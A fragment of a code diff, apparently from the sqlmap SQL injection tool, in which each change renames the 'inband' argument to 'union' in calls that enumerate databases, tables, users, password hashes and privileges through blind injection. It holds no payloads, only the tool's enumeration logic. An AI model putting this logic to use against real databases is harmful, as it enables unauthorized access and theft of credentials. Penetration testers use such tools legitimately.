foundTbl = inject.getValue(query, union=False, error=False)
|
||||
kb.hintValue = foundTbl
|
||||
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
||||
foundTbls[db].append(foundTbl)
|
||||
|
@ -431,7 +431,7 @@ class Search:
|
|||
query += colQuery
|
||||
query += whereDbsQuery
|
||||
query += whereTblsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no databases have tables containing column"
|
||||
|
@ -452,7 +452,7 @@ class Search:
|
|||
if Backend.isDbms(DBMS.DB2):
|
||||
query += ") AS foobar"
|
||||
query = agent.limitQuery(index, query)
|
||||
db = inject.getValue(query, inband=False, error=False)
|
||||
db = inject.getValue(query, union=False, error=False)
|
||||
db = safeSQLIdentificatorNaming(db)
|
||||
|
||||
if db not in dbs:
|
||||
|
@ -487,7 +487,7 @@ class Search:
|
|||
query = query % db
|
||||
query += " AND %s" % colQuery
|
||||
query += whereTblsQuery
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "no tables contain column"
|
||||
|
@ -507,7 +507,7 @@ class Search:
|
|||
query += " AND %s" % colQuery
|
||||
query += whereTblsQuery
|
||||
query = agent.limitQuery(index, query)
|
||||
tbl = inject.getValue(query, inband=False, error=False)
|
||||
tbl = inject.getValue(query, union=False, error=False)
|
||||
kb.hintValue = tbl
|
||||
|
||||
tbl = safeSQLIdentificatorNaming(tbl, True)
|
||||
|
|
|
@ -111,7 +111,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.count
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
errMsg = "unable to retrieve the number of database users"
|
||||
|
@ -127,7 +127,7 @@ class Users:
|
|||
query = rootQuery.blind.query2 % index
|
||||
else:
|
||||
query = rootQuery.blind.query % index
|
||||
user = inject.getValue(query, inband=False, error=False)
|
||||
user = inject.getValue(query, union=False, error=False)
|
||||
|
||||
if user:
|
||||
kb.data.cachedUsers.append(user)
|
||||
|
@ -252,7 +252,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.count % user
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
warnMsg = "unable to retrieve the number of password "
|
||||
|
@ -277,7 +277,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.query % (user, index)
|
||||
|
||||
password = inject.getValue(query, inband=False, error=False)
|
||||
password = inject.getValue(query, union=False, error=False)
|
||||
password = parsePasswordHash(password)
|
||||
passwords.append(password)
|
||||
|
||||
|
@ -467,7 +467,7 @@ class Users:
|
|||
else:
|
||||
query = rootQuery.blind.count % user
|
||||
|
||||
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
|
||||
if not isNumPosStrValue(count):
|
||||
if Backend.isDbms(DBMS.ORACLE) and not query2:
|
||||
|
@ -500,7 +500,7 @@ class Users:
|
|||
query = rootQuery.blind.query % (index, user)
|
||||
else:
|
||||
query = rootQuery.blind.query % (user, index)
|
||||
privilege = inject.getValue(query, inband=False, error=False)
|
||||
privilege = inject.getValue(query, union=False, error=False)
|
||||
|
||||
# In PostgreSQL we get 1 if the privilege is True,
|
||||
# 0 otherwise
|
||||
|
|